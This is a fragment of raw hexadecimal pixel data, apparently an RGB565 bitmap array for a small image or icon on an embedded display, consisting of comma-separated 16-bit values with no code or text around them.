0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xeffe, 0xefff, 0xaeff, 0x1b95, 0x0b75, 0x4cda, 0xc7df, 0xffff, 0xfffe, 0xfffd, 0xffdc, 0xffde, 0xff7e, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7fe, 0xf7fe, 0xf7df, 0xffff, 0xffdf, 0xffdc, 0xffdd, 0xffde, 0xf7ff, 0xdfff, 0x867c, 0x1b33, 0x2b74, 0x64f7, 0xe7ff, 0xefff, 0xffdf, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xbe7e, 0x122f, 0x1335, 0x024d, 0xa69e, 0xf7ff, 0xffff, 0xffff, 0xefdf, 0x7455, 0xcf1f, 0xffff, 0xffdd, 0xffde, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xefff, 0xfffe, 0xffbd, 0xf7ff, 0x6c96, 0xbede, 0xffff, 0xffde, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffdf, 0xffff, 0xf7fc, 0xf7fb, 0xf7fd, 0xd7bf, 0x2b34, 0x0ad4, 0x0250, 0x74b7, 0xffdf, 0xffff, 0x8558, 0x0211, 0x1b1b, 0x1334, 0x0210, 0x2a91, 0x84f8, 0xdfbf, 0xf7ff, 0xffdf, 0xff9e, 0xffff, 0x8d78, 0x0270, 0x0b36, 0x02b4, 0x6498, 0xf7ff, 0xffdd, 0xf7df, 0xf7ff, 0xdfff, 0x8578, 0x3350, 0x020e, 0x12f5, 0x12d7, 0x0233, 0x5416, 0xe7ff, 0xf7ff, 0xfffe, 0xfffe, 0xffbe, 0xffdf, 0xffde, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffde, 0xffde, 0xf7ff, 0xbf3f, 0x1b12, 0x1375, 0x553c, 0xd7ff, 0xffff, 0xffbc, 0xfffd, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xf7ff, 0xf7fe, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xf7be, 0xffff, 0xf7df, 0xffff, 0xffbb, 0xffbc, 0xf7ff, 0xbf9f, 0x2c7a, 0x13f6, 0x4c97, 0xdfdf, 0xf7ff, 0xffde, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7df, 0xefff, 0xbf9f, 0x3c57, 0x0b33, 0x2bf7, 0x85dd, 0xd7ff, 0xefff, 0xffff, 0xffde, 0xfffe, 0xffbd, 0xffdd, 0xfffd, 0xffdc, 0xfffd, 0xfffd, 0xfffd, 0xffff, 0xffff, 0xf7df, 0xe7ff, 0xefff, 0xefff, 0xaf1e, 0x3c75, 0x1373, 0x2bb4, 0x8ddb, 0xe7ff, 0xefff, 0xf7de, 0xffff, 0xffff, 0xffde, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xb69f, 0x1251, 0x1b14, 0x020f, 0xb6dd, 0xf7ff, 0xffff, 0xffdf, 0xf7ff, 0x6c14, 0x428f, 0xe75f, 0xffff, 0xffff, 0xfffd, 0xfffe, 0xffdf, 0xf7df, 0xffff, 0xfffe, 0xf7fe, 0xffdd, 0xffff, 0xf7ff, 0x8d5a, 0x19ab, 0xdf5f, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7fe, 0xf7fc, 0xfffe, 0xe7ff, 0x3373, 0x0ad4, 0x0a72, 0x7cf9, 0xf7ff, 0x5bb2, 0x120f, 0x1ad5, 0x53d4, 0xae7e, 0xefff, 0xffff, 0xfffd, 0xfffe, 0xffbf, 0xffdf, 0xf7ff, 0x8579, 0x02f4, 0x037a, 0x02d7, 0x64ba, 0xf7df, 0xffde, 0xf7de, 0xf7ff, 0xf7ff, 0xefff, 0xe7df, 0xbeff, 0x5436, 0x2b14, 0x1271, 0x2290, 0xdfdf, 0xf7ff, 0xf7fe, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xfffe, 0xfffe, 0xffbe, 0xffff, 0xbf7f, 0x3437, 0x0356, 0x3479, 0xa6ff, 0xe7ff, 0xefff, 0xf7df, 0xffbf, 0xffdf, 0xffdf, 0xffde, 0xffde, 0xfffd, 0xffbc, 0xffdd, 0xffbe, 0xffde, 0xffdd, 0xffdd, 0xffde, 0xffff, 0xefff, 0xefff, 0xdfff, 0x85bb, 0x1b55, 0x13b8, 0x5d38, 0xdfff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xffff, 0xdfdf, 0x85da, 0x2372, 0x0b77, 0x2c39, 0x7dfe, 0xcfbf, 0xefff, 0xf7ff, 0xf7fe, 0xffff, 0xfffe, 0xfffe, 0xffdd, 0xfffd, 0xfffe, 0xffff, 0xf7ff, 0xefff, 0xb7ff, 0x973f, 0x4cf9, 0x13b6, 0x1375, 0x4c97, 0xbf3f, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7ff, 0xefff, 0xf7ff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xbebe, 0x0a72, 0x02f6, 0x12d3, 0xa67d, 0xffff, 0xffbe, 0xffdd, 0xf7ff, 0xb69e, 0x19cb, 0xe77f, 0xf7df, 0x8496, 0xcefe, 0xfffe, 0xffdc, 0xfffe, 0xf7df, 0xffff, 0xffde, 0xfffd, 0xf7ff, 0x74b5, 0xc73f, 0xefff, 0x8475, 0x3a6c, 0xefff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xfffc, 0xf7fd, 0xdfff, 0x1b33, 0x0335, 0x0271, 0x857a, 0xefdf, 0xbe9c, 0xd79f, 0xffdf, 0xf7ff, 0xf7ff, 0xeffd, 0xf7fe, 0xf7ff, 0xf7df, 0xffff, 0xf7ff, 0x857a, 0x02b4, 0x037a, 0x0337, 0x5c98, 0xf7ff, 0xffdf, 0xf7fe, 0xf7ff, 0xf7bf, 0xffbf, 0xffff, 0xffff, 0xf7ff, 0xd7bf, 0xc71e, 0xdf7f, 0xf7ff, 0xffde, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffdf, 0xffdf, 0xf7ff, 0xd7ff, 0x4cd8, 0x13b6, 0x0bb6, 0x4d1a, 0xaf7f, 0xdfff, 0xefff, 0xffff, 0xffde, 0xffdd, 0xffde, 0xffde, 0xffbd, 0xffdd, 0xffdd, 0xffbc, 0xffdc, 0xfffe, 0xffff, 0xf7ff, 0xd7ff, 0x8ebf, 0x2418, 0x1397, 0x23b6, 0x865f, 0xefff, 0xf7fe, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xfffd, 0xfffe, 0xefff, 0xcf9f, 0x4d7c, 0x0b75, 0x0b54, 0x1b93, 0x54d7, 0x863b, 0x9f1e, 0xbfff, 0xcfff, 0xdfff, 0xe7ff, 0xe7df, 0xd7df, 0xbf5f, 0x967c, 0x7557, 0x2415, 0x13b4, 0x0b94, 0x2c17, 0x967f, 0xe7ff, 0xf7ff, 0xffff, 0xefff, 0xefff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xfffe, 0xffff, 0xf7ff, 0xefff, 0xf7ff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xbede, 0x0a71, 0x0b38, 0x02d5, 0x7dbc, 0xefff, 0xffbf, 0xffde, 0xfffe, 0xefff, 0x3aaf, 0x8d5a, 0xefff, 0x8d36, 0x1989, 0xdf7f, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xefff, 0x5c76, 0x11cb, 0xf7ff, 0xf7df, 0x21eb, 0xb6bd, 0xefff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xfffe, 0xfffc, 0xf7ff, 0xb75f, 0x02d3, 0x1398, 0x0251, 0x7cf8, 0xf7ff, 0xf7fe, 0xff9f, 0xffbf, 0xf7ff, 0xe7ff, 0xe7ff, 0xefff, 0xffdf, 0xff9d, 0xffff, 0x9579, 0x1293, 0x1399, 0x02f5, 0x5497, 0xf7ff, 0xff9e, 0xffdd, 0xfffe, 0xffff, 0xffbf, 0xff9f, 0xffdf, 0xffde, 0xfffe, 0xfffd, 0xffdc, 0xffdd, 0xffbd, 0xfffe, 0xffff, 0xf7fe, 0xf7ff, 0xffdd, 0xfffe, 0xffff, 0xffdf, 0xffde, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0xfffd, 0xfffd, 0xefff, 0x8e9e, 0x2c17, 0x0b34, 0x1b93, 0x4cd7, 0x96bf, 0xbfbf, 0xe7ff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xe7ff, 0xdfff, 0xc75f, 0x8579, 0x3bf4, 0x0b53, 0x0bb7, 0x44fb, 0xc7bf, 0xf7ff, 0xfffd, 0xfffd, 0xf7fe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xd7ff, 0xcfff, 0x75fc, 0x3436, 0x1393, 0x0372, 0x0373, 0x0b54, 0x1375, 0x23b6, 0x2bd6, 0x1b94, 0x1394, 0x0b73, 0x0b73, 0x0b51, 0x3bf4, 0x6518, 0xb6ff, 0xe7ff, 0xf7ff, 0xffdf, 0xffff, 0xf7df, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffb, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7be, 0xffdf, 0xffff, 0xbeff, 0x0210, 0x0b17, 0x1358, 0x12b2, 0x8599, 0xefff, 0xffdd, 0xffff, 0xefff, 0xc6bc, 0x320c, 0xe7ff, 0xaeff, 0x120a, 0xdf9f, 0xf7df, 0x8cb7, 0xbe7d, 0xf7ff, 0xf7dc, 0xfffd, 0xefde, 0x6bd2, 0xdf9f, 0xe7ff, 0x4b50, 0x7475, 0xe7ff, 0x8577, 0x4b6f, 0xefff, 0xffff, 0xffbe, 0xfffe, 0xffff, 0xf7fe, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdd, 0xfffe, 0xd75f, 0x22f4, 0x12f8, 0x1358, 0x0a51, 0x6c96, 0xefff, 0xffbd, 0xff9e, 0xffdf, 0xf7df, 0xf7ff, 0xf7de, 0xfffe, 0xffdc, 0xffdd, 0x9d99, 0x0a51, 0x0b38, 0x0316, 0x5497, 0xf7ff, 0xffbd, 0xfffe, 0xfffe, 0xfffd, 0xfffd, 0xffde, 0xffbe, 0xffff, 0xfffe, 0xfffd, 0xfffd, 0xffbd, 0xffde, 0xffde, 0xffff, 0xffff, 0xffdf, 0xfffd, 0xfffd, 0xfffe, 0xffde, 0xfffe, 0xffde, 0xffbe, 0xffbe, 0xf7be, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xf7fe, 0xf7fe, 0xfffe, 0xffdd, 0xfffe, 0xf7ff, 0xdfff, 0xa6bd, 0x4c75, 0x1372, 0x0312, 0x1375, 0x2c16, 0x44d9, 0x6ddd, 0x7e5f, 0x867f, 0x867f, 0x763e, 0x5d7b, 0x3c97, 0x23f5, 0x1313, 0x1b54, 0x1b53, 0x6559, 0xb7bf, 0xdfff, 0xffff, 0xffbe, 0xffdc, 0xfffd, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffdf, 0xfffd, 0xffff, 0xefff, 0xd7ff, 0xbfff, 0x8edf, 0x6dfd, 0x4d1b, 0x3c9a, 0x3459, 0x2c58, 0x34d9, 0x3cfa, 0x557b, 0x767f, 0xa79f, 0xe7ff, 0xf7ff, 0xffff, 0xffdd, 0xfffc, 0xffdd, 0xffbf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xf7ff, 0xf7df, 0xffff, 0xffdf, 0xb67e, 0x0a0f, 0x1315, 0x1337, 0x1315, 0x0a50, 0x95ba, 0xefff, 0xfffc, 0xefdf, 0xe7ff, 0x8d36, 0x634f, 0xefff, 0x7d7d, 0x3b93, 0xefff, 0xadb7, 0x21ab, 0xcf5f, 0xf7ff, 0xfffd, 0xfffd, 0xf7fe, 0x5c16, 0x4b30, 0xf7ff, 0xcf1e, 0x222c, 0xd7ff, 0xc77f, 0x21e9, 0xe7bf, 0xffff, 0xffdf, 0xffde, 0xffff, 0xf7ff, 0xffff, 0xffdf, 0xffbf, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xffff, 0xd6ff, 0x2a54, 0x2af9, 0x1b18, 0x12f5, 0x0a92, 0x5cdb, 0xf7ff, 0xf7df, 0xffbf, 0xff9d, 0xffbd, 0xfffe, 0xffbe, 0xffff, 0xf7ff, 0x8db9, 0x0251, 0x0b59, 0x02b6, 0x5cda, 0xe7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffbe, 0xffbd, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xfffd, 0xfffe, 0xe7ff, 0xb79f, 0x761c, 0x44d8, 0x1bf6, 0x0bb6, 0x13b4, 0x1394, 0x1374, 0x0b74, 0x0375, 0x0bb5, 0x1bf5, 0x2c36, 0x551a, 0x8e9f, 0xc7ff, 0xe7ff, 0xfffe, 0xfffc, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdd, 0xff9d, 0xffdf, 0xffbf, 0xf7ff, 0xefff, 0xefff, 0xe7ff, 0xdfff, 0xd7ff, 0xd7ff, 0xd7ff, 0xdfff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7bf, 0xffdf, 0xff9d, 0xffdd, 0xfffe, 0xffbd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xae3d, 0x1232, 0x2316, 0x1290, 0x9edf, 0x2374, 0x0a92, 0x8d7b, 0xffff, 0xfffd, 0xf7ff, 0xefff, 0x6c52, 0x7cb4, 0xe7ff, 0x53b8, 0x7d1c, 0xe7ff, 0x5b6d, 0x8d36, 0xe7ff, 0xd79f, 0x9534, 0xf7fd, 0xfffe, 0xd7ff, 0x198a, 0xe79e, 0xefff, 0x19ca, 0xc77f, 0xdfff, 0x21eb, 0xdf7f, 0xf7ff, 0xffdf, 0xffde, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffdf, 0xffff, 0xf7fe, 0xfffd, 0xfffe, 0xd71f, 0x2275, 0x1296, 0x85df, 0x43f5, 0x0ab2, 0x0296, 0x6cb5, 0xe7ff, 0xffff, 0xff9c, 0xffdc, 0xffff, 0xcf3f, 0xc73f, 0xbf5f, 0x861d, 0x0b35, 0x1bfc, 0x2399, 0x5459, 0xcfbf, 0xc79f, 0xb6fe, 0xcfbf, 0xb71f, 0xc75f, 0xcf9f, 0xb6ff, 0xc79f, 0xc7df, 0xa6bf, 0xcfbf, 0xc75f, 0xb6ff, 0xd7df, 0xb71f, 0xc77f, 0xcf9f, 0xaeff, 0xc7bf, 0xbf5f, 0xaebf, 0xcfdf, 0xb6ff, 0xc6ff, 0xefff, 0xffdf, 0xffdd, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffde, 0xffbc, 0xffdd, 0xffff, 0xefff, 0xefff, 0xe7ff, 0xc7df, 0xb79f, 0x9f1f, 0x8e7c, 0x8e5b, 0x8e9c, 0x96de, 0xa75f, 0xc7bf, 0xd7bf, 0xefff, 0xefff, 0xf7ff, 0xf7fe, 0xffdd, 0xffdc, 0xffde, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
